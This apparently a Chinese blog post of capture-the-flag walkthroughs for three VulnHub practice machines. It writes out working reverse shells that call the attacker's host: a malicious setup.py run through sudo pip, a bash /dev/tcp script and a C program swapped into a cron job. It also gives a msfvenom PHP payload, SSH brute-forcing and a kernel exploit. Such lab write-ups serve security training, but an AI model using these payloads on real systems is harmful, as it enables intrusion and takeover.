VulnHub靶场LupinOne

这个靶场是一个很好的练习环境，整套渗透流程，用来模拟环境非常合适

链接：https://pan.baidu.com/s/1lX79juqZJl4roKakTwWQxQ 
提取码：8rcv

在这里，我把我遇到的问题一起分享给大家

直接解压用虚拟机打开就行,不用自己配置,没有账号密码,需要自己一步步来,对了,这是自动获取IP的,不需要自己配置.

一.信息收集

信息收集是很重要的,举个栗子来说,比如约出自己的女神出来玩,肯定向了解女神的经济情况还有喜好嘛,通过她的微信朋友圈,她身边的好友,淘宝等等,了解一个人,就要从最贴近生活的方向开始,就像"只有千日做贼,那有千日防贼",感觉有点不太贴切,意思是差不多的,用这个只是想表达信息收集的重要性.

1.1寻找目标

在正常情况下,我们并不知道目标IP,在这里可以使用nmap进行扫描,Nmap具体是什么可以百度了解,这里不在多说.

我的kali所用IP:192.168.31.15（后面我的ip会变化，因为这不是再一个地方完成的，但是不影响参考）

nmap探测

命令:nmap 192.168.31.15/24

Nmap是一个很强大的工具,关于它的用法一定要好好掌握,上图中可以看到IP为’192.168.31.251’的就是靶机地址,详细扫描

靶机开发了22和80端口

默认就是访问80端口

检查出现一句话" Its an easy box, dont give up. “意思是"它是一个简单的盒子，不要放弃。”

至于22端口是ssh的,现在没有账号密码也无法使用

到这里,就可以进入下一个模块了

二.Web渗透

2.1目录遍历扫描

对于目录遍历,在一些大企业的网站,都有安全设备,对于目录遍历这样的操作,是会有告警的,最近一直在重保,这样的告警很多很多.

对于目录遍历,工具有很多,比如 御剑,gobuster,DirBuster及wwwscan等,而这些都是工具,在Github都能找到.最主要的还是字典.

在这里我使用gobuster进行目录遍历

我的字典位置

gobuster dir -w big.txt -u http://192.168.31.251

上面扫描的结果出来了，返回值200的时robots.txt文件

试着访问~myfile这个文件夹，好家伙，页面就是404，下面还有一个注释的话“你可以的，继续努力。”

到这里似乎陷入僵局，猜测需要传参数

wfuzz -c -w discovery/predictable-filepaths/filename-dirname-bruteforce/upload_variants.txt -u http://192.168.43.36/~myfiles/?FUZZ=a

没用，继续目录扫描

wfuzz -c -w directory-list-2.3-big.txt -u http://192.168.43.36/~FUZZ |grep -v 404

过滤掉404

目前就出来一个，通过浏览器访问

这段文字包含信息很多，需要仔细阅读

私钥文件一般使用格式：txt、html、pub、cer、pem、der、key等等

这里爆破使用burp2021.21.1，截取数据报，隐藏文件格式就像这样的

设置位置以及字典

这里不得不提中文版的真舒服，第一个位置用这个字典，对了这字典在GitHub都能找到。这里就不多说了

第二个字典自己手动添加就行，文件后缀名，线程60

……我错了，中文版的执行爆破程序报错，英文版的没有问题，我这是第一次用这个版本，唉，bug还是太多了

既然出来了，就没有必要再往下跑了，访问这个文件(后面的我试了，没有其它文件了)

看着这像base64，试着转码一下，很明显，这个不是

这里推荐一个网站 链接: link. https://www.dcode.fr/identification-chiffrement

这个网站可以识别一些加密方式，Base58概率最大

可以看到，解码出来的结果就是一个证书

将其保存以下形式

2.2破解私钥爆破密码

之前做的时候，kali自带的python3.x，执行ss2john.py报错，这个是我其他系统配置的python2.7环境，可以正常执行这个脚本

这个就是生成的内容，发送到kali中，使用john爆破密码

还记得上上面有段话吗，这个关键咱们现在用到了

关于john的用法可以百度，可以看它的帮助命令，很简单使用

john creck.txt --fork=4 fork --wordlist=/usr/share/wordlists/fasttrack.txt

密码出来了，P@55w0rd! ,密码出来了，用户名呢？难道是root，怎么可能呢，用户名就是icex64，上面那段文字给的

2.3登录

设置权限为600，私钥文件仅可自己读，但是，我这里登录不上去

可以通过XSHLL

输入后确定，也可修改密码，点击浏览-属性-修改密码，记住密码，登录即可

3mp!r3{I_See_That_You_Manage_To_Get_My_Bunny}

有个flag

三.提权

3.1提权到arsene

关于sudo的命令可以查看它的帮助

sudo -l   #-l, --list 列出用户的权限或检查特定命令；

查看action文件内容,还有一个note.txt,没别的意思 ,就是要执行heist.py

好了,再次查看heist.py这个文件

这里引入webbrowser

查找webbrowser

locate webbrowser

编辑文件添加下面那句话,我这使用vi出问题.所以用的nano

执行id,成功提权到arsene

3.2提权到root_1

https://gtfobins.github.io/  #Linux提权

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF

flag:

3mp!r3{congratulations_you_manage_to_pwn_the_lupin1_box}

结束

3.3提权到root_2

通过反弹shell方式连接

通过这种方式，会遇到权限问题，需要再"/home/icex64"目录下创建一个名为“setup.py”的文件，如果你这个时候，权限是arsene的权限，你是无法再这里创建的，需要再icex64权限下创建"setup.py"

vi setup.py #或者是nano setup.py

from setuptools import setup
from setuptools.command.install import install
import os, socket, subprocess

class CustomInstall(install):
  def run(self):
    install.run(self)
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(("192.168.10.131",4444)) #此处是kali ip地址
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    p=subprocess.call(["/bin/sh","-i"])

setup(name='FakePip',
      version='0.0.1',
      description='Reverse shell',
      url='xx.xx.xx.xx',
      author='nathan',
      author_email='xx@xx',
      license='MIT',
      zip_safe=False,
      cmdclass={'install': CustomInstall})

如果，你没再icex64下面创建此脚本，

再执行此脚本前，需要再kali中执行监听，会报错

nc -lvvp 4444

再执行

sudo pip install . --upgrade

kali中显示

3mp!r3{congratulations_you_manage_to_pwn_the_lupin1_box}

See you on the next heist.

好了，到这里差不多结束了

也可以再root命令下修改root密码

passwd root

当然了，也可以修改其他用户密码了

四.收获

实践是检验真理的唯一标准

vulnhub靶场，RED: 1

环境准备

靶机下载地址：https://www.vulnhub.com/entry/red-1,753/
攻击机：kali（192.168.109.128）
靶机：RED: 1（192.168.109.197）
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境，启动即可，将网段设置为NAT模式
目标：提升为root权限获取root目录下的flag

信息收集

使用arp-scan确定目标靶机

确定目标靶机IP为192.168.109.197
使用nmap扫描查看目标靶机端口开放情况

开放端口：22、80
浏览器访问目标靶机80端口

域名自动跳转到redrocks.win，说明存在域名重定向，进入配置文件/etc/hosts进行配置

再次进行访问

页面提示说找不到他的后门，说明此网站肯定已经被植入了后门，查看一下源代码

这里有一段英文，意思就是说要向Mr. Miessler寻求帮助，也不知道是啥意思，在网上搜一下

发现其中指向了gitub上的一个字典，正好kali上也是自带这个字典的
尝试用其中的字典进行目录扫描

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt -x .php -u http://redrocks.win/

发现一个NetworkFileManagerPHP.php页面，进行访问，但是访问后发现是一片空白，说明确实存在这个页面，再根据状态码为500猜测这个页面可能存在LFI，使用wfuzz测试一下参数，字典也用github上面提供的字典文件

wfuzz -c -u 'http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test' -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt

使用key参数测试一下LFI

确实存在文件包含漏洞

渗透过程

尝试污染日志文件和远程包含均失败，使用filter协议查看NetworkFileManagerPHP.php源码

将结果base64解码一下

里面又存在一段base64加密的密文，使用base64在进行一次解密

That password alone won’t help you! Hashcat says rules are rules
仅凭那个密码对您没有帮助！ Hashcat 说规则就是规则
提到了密码、Hashcat 和规则。由于它是 base64 编码的，我们可以假设 Red 在谈论 Hashcat 的 Best64 规则为密码突变，想到的这里大概能获取 wp-config 文件，里面有数据库的密码：

经base64解码得

<?php

/**

 * The base configuration for WordPress

 *

 * The wp-config.php creation script uses this file during the installation.

 * You don't have to use the web site, you can copy this file to "wp-config.php"

 * and fill in the values.

 *

 * This file contains the following configurations:

 *

 * * MySQL settings

 * * Secret keys

 * * Database table prefix

 * * ABSPATH

 *

 * @link https://wordpress.org/support/article/editing-wp-config-php/

 *

 * @package WordPress

 */

// ** MySQL settings - You can get this info from your web host ** //

/** The name of the database for WordPress */

define( 'DB_NAME', 'wordpress' );



/** MySQL database username */

define( 'DB_USER', 'john' );



/** MySQL database password */

define( 'DB_PASSWORD', 'R3v_m4lwh3r3_k1nG!!' );



/** MySQL hostname */

define( 'DB_HOST', 'localhost' );



/** Database Charset to use in creating database tables. */

define( 'DB_CHARSET', 'utf8' );



/** The Database Collate type. Don't change this if in doubt. */

define( 'DB_COLLATE', '' );



define('FS_METHOD', 'direct');



define('WP_SITEURL', 'http://redrocks.win');

define('WP_HOME', 'http://redrocks.win');



/**#@ 

 * Authentication unique keys and salts.

 *

 * Change these to different unique phrases! You can generate these using

 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.

 *

 * You can change these at any point in time to invalidate all existing cookies.

 * This will force all users to have to log in again.

 *

 * @since 2.6.0

 */

define('AUTH_KEY',         '2uuBvc8SO5{>UwQ<^5V5[UHBw%N}-BwWqw|><*HfBwJ( $&%,(Zbg/jwFkRHf~v|');

define('SECURE_AUTH_KEY',  'ah}<I`52GL6C^@~x C9FpMq-)txgOmA<~{R5ktY/@.]dBF?keB3} Y^u!a54 Xc(');

define('LOGGED_IN_KEY',    '[a!K}D<7-vB3Y&x_<3e]Wd J]!o A:U@QUZ-RU1]tO@/N}b}R@ /$ u*pJ|Z(xu-');

define('NONCE_KEY',        ' g4|@~:h,K29D}$FL-f/eujw(VT;8wa7xRWpVR: >},]!Ez.48E:ok 8Ip~5_o a');

define('AUTH_SALT',        'a;,O<~vbpL |@W !Rs1o,T$r9(LwaXI =I7ZW$.Z[ BQ=B6QG7nr w_bQ6B]5q4c');

define('SECURE_AUTH_SALT', 'GkU:% Lo} 9}w38i:%]=uq&J6Z&RR#v2vsB5a_  .[us;6mE |$x*  D*Ke :Nt:');

define('LOGGED_IN_SALT',   '#`F9&pm_jY}N3y0&8Z]EeL)z,$39,yFc$Nq`jGOMT_aM*`<$9A:9<Kk^L}fX@ iZ');

define('NONCE_SALT',       'hTlFE*6zlZMbqluz)hf:-:x-:l89fC4otci;38|i`7eU1; k[!0[ZG.oCt2@-y3X');



/**#@-*/



/**

 * WordPress database table prefix.

 *

 * You can have multiple installations in one database if you give each

 * a unique prefix. Only numbers, letters, and underscores please!

 */

$table_prefix = 'wp_';



/**

 * For developers: WordPress debugging mode.

 *

 * Change this to true to enable the display of notices during development.

 * It is strongly recommended that plugin and theme developers use WP_DEBUG

 * in their development environments.

 *

 * For information on other constants that can be used for debugging,

 * visit the documentation.

 *

 * @link https://wordpress.org/support/article/debugging-in-wordpress/

 */

define( 'WP_DEBUG', false );



/* Add any custom values between this line and the "stop editing" line. */







/* That's all, stop editing! Happy publishing. */



/** Absolute path to the WordPress directory. */

if ( ! defined( 'ABSPATH' ) ) {

	define( 'ABSPATH', __DIR__ . '/' );

}



/** Sets up WordPress vars and included files. */

require_once ABSPATH . 'wp-settings.php';

账号：john
密码：R3v_m4lwh3r3_k1nG!!
尝试使用这个账号密码进行ssh远程连接

连接失败，根据前面得hashcat，将密码保存到pass.txt文件使用hashcat规则进行破解

hashcat --stdout pass.txt -r /usr/share/hashcat/rules/best64.rule > passlist.txt

使用hydra进行暴力破解

hydra -l john -P passlist.txt ssh://192.168.109.197

使用john:R3v_m4lwh3r3_k1nG!!6进行远程连接

连接成功

权限提升

在当前目录下发现一个note_from_red.txt文件，查看其内容

这里发现好像将cat和vi命令的作用给互换了，这个文件给出得内容也是说的这个意思
查看sudo命令

发现ippsec用户在无密码的情况下可以执行/usr/bin/time命令，在提权网站上查找提权方法

再次准备进行操作的时候发现ssh连接自动断掉了，而且再次进行连接发现密码也被修改了，只能再次破解一次

使用sudo -u ippsec /usr/bin/time /bin/bash提权为ippsec用户

想进行下一步操作，发现shell又被断掉了

应该是这个靶机的设定，那再重复之前的操纵，在靶机上创建一个反弹shell的脚本
靶机上：

cd /tmp
cat shell.sh
内容为：
#!/bin/bash
bash -c 'bash -i >& /dev/tcp/192.168.109.128/4444 0>&1'
保存后退出
chmod +x shell.sh
./shell.sh

kali监听本地的4444端口即可

shell连接成功，升级一下shell

1. 在 /tmp 目录中创建一个反向 shell bash 脚本
2. 在 kali 上运行 `nc -lvvp 4444` 和 执行 shell 脚本
3. `python3 -c 'import pty;pty.spawn("/bin/bash")'`
4. `export TERM=xterm` 然后 Ctrl+Z 退出来一下
5. `stty raw -echo;fg` 回车后输入 reset 再回车

即可得到一个不会断开的shell

做到这里，发现一个问题，就是命令行上总是会不时的弹出一些消息，肯定是设置什么定时任务，下载pspy64s监听
spy是一种命令行工具，无需root权限即可监听进程。可查看其他用户执行的命令，cron作业等

https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s

先在kali上下载好后搭建一个临时的http服务即可

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s

python3 -m http.server 8000

靶机上：

wget http://192.168.109.128:8000/pspy64s
chmod +x pspy64s
./pspy64s

这里不知道怎么回事反弹回来的shell就一直有问题，就凑合看吧

这应该是他对系统的后门，查看一下这个 supersecretfileuc.c 文件

发现是定时弹出的脚本，所以只需要上传一个提权的脚本将此脚本进行替换即可
先删除 /var/www/wordpress/.git/supersecretfileuc.c 和 rev 文件

写入由c语言编写的反弹shell代码

反弹shell代码：
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(void){
    int port = 4444;
    struct sockaddr_in revsockaddr;

    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;       
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("192.168.109.128");

    connect(sockt, (struct sockaddr *) &revsockaddr, 
    sizeof(revsockaddr));
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    char * const argv[] = {"/bin/bash", NULL};
    execve("/bin/bash", argv, NULL);

    return 0;       
}

使用python搭建临时的http服务

python3 -m http.server 8000

靶机上：

wget http://192.168.109.128:8000/supersecretfileuc.c

然后kali上监听4444端口，稍微等待一下，即可反弹回来一个权限为root的shell

在其root目录下获取最终的flag，靶机RED: 1渗透结束

练习靶场 prime:1

下载地址：https://download.vulnhub.com/prime/Prime_Series_Level-1.rar

 目的是找到flag。要进入到系统目录中去找。

一.  网络的设置

我遇到的情况是NET模式下连接不成功，所以我进入的拯救模式，将动态网络配置改成静态网络来进行的复现。其中具体的原因我还没弄清楚。但设置完静态网络后就能够正常复现了。

二 . 开始渗透

  1. 检测IP和端口（nmap工具）

  按照靶机的设定，在不知道具体的IP地址情况下对prime1靶机进行攻击，现在我的ip是静态的，我是知道IP的，但是这个不影响复现，还是先进行对IP地址的扫描。在kali系统中用nmap工具进行操作：

namp -sP 192.168.96.96.0/24       // -sP参数是 使用ping命令来扫描主机，发现主机的。

 nmap -P 192.168.96.221        //-P 是扫描该主机中的port端口，没扫出来换参数。

nmap -A -o -sV 192.168.96.221   //-A综合扫描，-o主机系统 ，-vS 版本扫描

 2. 目录扫描（dirb工具）

  前面扫描到了IP和端口，查看到22端口和80端口是开放的，尝试看看网站能否访问，是可以访问的，但是没有地方可以输入，进行下一步尝试。

  所以进行目录扫描开是否有可以利用的目录，这里用到kali中dirb工具：

命令：dirb http://192.168.96.221/       //这个扫描有太多的目录，所以进行过滤。这里看到wordpress，一个开源的CMS（内容管理系统）

命令：dirb http://192.168.96.221 -X .txt,.php,.zip    //-X是 在字典后加上后缀

 得出的三个目录挨个访问一下，用kali中的curl来访问），有一个有用的信息location.txt，先记录下来。

 其中两个php文件我们就要考虑到是否有参数可以利用？

三. 扫描参数（fuzz工具）

  利用dirb扫描出的php文件，看看是否可以得到信息。

命令： wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.96.221/index.php?FUZZ

 这里得到信息有很多，我们能要进行筛选有用的，可以从word字节数来筛选（ps：也可用其他的条件筛选）这里用到参数  “--hw 12 ”。就筛选出来file

 带入访问：

看到提示digginf wrong file ，这像是文件包含，先尝试一下。就用前面的location.txt，得到了下一步的提示，use  ‘secrettier360' parameter on some other page..。

 用这个提示访问。

 利用文件包含获取信息，/etc/passwd

在倒数第二行中可以看到 /home/saket/password.txt,这可能存放着密码信息。follow_the_ippsec

 这里找到了密码，去系统登录页面去登录发现不能登录。在开放的端口去尝试数据库的登录也不行。这里就要想到在dirb工具扫描时有wordpress。看看能否从中突破？

四. wordpress的渗透

登录它的后台登录页面：http://192.168.96.221/wordpress/wp-admin/user/admin.php

但是缺少用户名，着就要用到cmseek工具，可以枚举用户名。

      cmseek -u http://192.168.96.221/wordpress/

 没有扫描出来用户名，换另一个工具：wpscan

wpscan --url http://192.168.96.221/wordpress/ --enumerate u   //参数 --url 域名 ，--enumerate 枚举用户名

可以得到用户名：victor。

 这里进入到worpress的后台，并且还是通过最高权限的用户victor登录的。在wordpress中我们可以通过扫描器直接去扫描，这里我们用wordpress的一个可以上传代码的地方去突破。在Appearance中的Theme Editor找到一个可以保存代码的地方。

 在找到这个地方一阵幸喜，因为我们可以通过它上传一句话木马来获取权限，但是考虑到一句话木马很可能被WAF干掉，我们换一种方式 用反弹连接，反弹连接我们可以通过GitHub上搜索一个，也可以通过kali中的工具msfconsole，它是一个强大的渗透工具，现在讲一讲使用它来建立的反弹连接。

生成payload，用msfconsole的一个模块：

命令 msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.96.226 lport=7777 -o shell.php

上面命令中-p 载荷payload -o 输出到指定文件 lhost 攻击机的ip lport 端口

将shell.php中的payload复制到wordpress中，上传。同时我们还要知道上传的文件路径。

 将payload上传了，在kali中进入msfconsole，

 开启监听：use exploit/multi/handler,

开始输入设置的，set payload php/meterpreter/revere.php

在输入 set lhost 192.168.96.221

再输入 set lport 7777     

最后输入 exploit   

输入完成后如果参数都正确，开启监听，访问  http://192.168.96.221/wordpress/wp-content/themes/twentynineteen/secret.php（这就是payload的上传路径） 之后就能监听，并建立一个对话。

 建立的对话可以查到靶机的版本——用命令：sysinfo

知道了靶机的版本，通过kali中的工具msfconsole查到一些系统的漏洞，并且有可利用的c文件。

我们用xshell再连接一个kali，打开msfconsole，输入命令 ：searchsploit 16.04 Ubuntu    在里面找到对应版本的漏洞信息。

 我们再在xshell中启一个kali，把.c文件复制到当前用户目录下，并且编译输出一个可执行文件45010

 完成上面的步骤后我们在建立的反弹连接的对话上上传编译的文件

 上传的45010文件传到tmp目录下是该目录下可读写。我们在查看一些文件是否上传了，并且看看是否可执行，如果不能执行我们提升权限。

 上面看到45010文件不能执行，我们知道提升权限的命令chmod +x。

提升权限后执行该文件 ./45010 执行后我们就可以在文件目录中找需要的文件。

 PS 有些情况我们下载的靶机的版本并不是Ubuntu4.10而是Ubuntu 4.15，就不能通过45010这个复现成功。

新人发帖，欢迎指出不足，虚心接受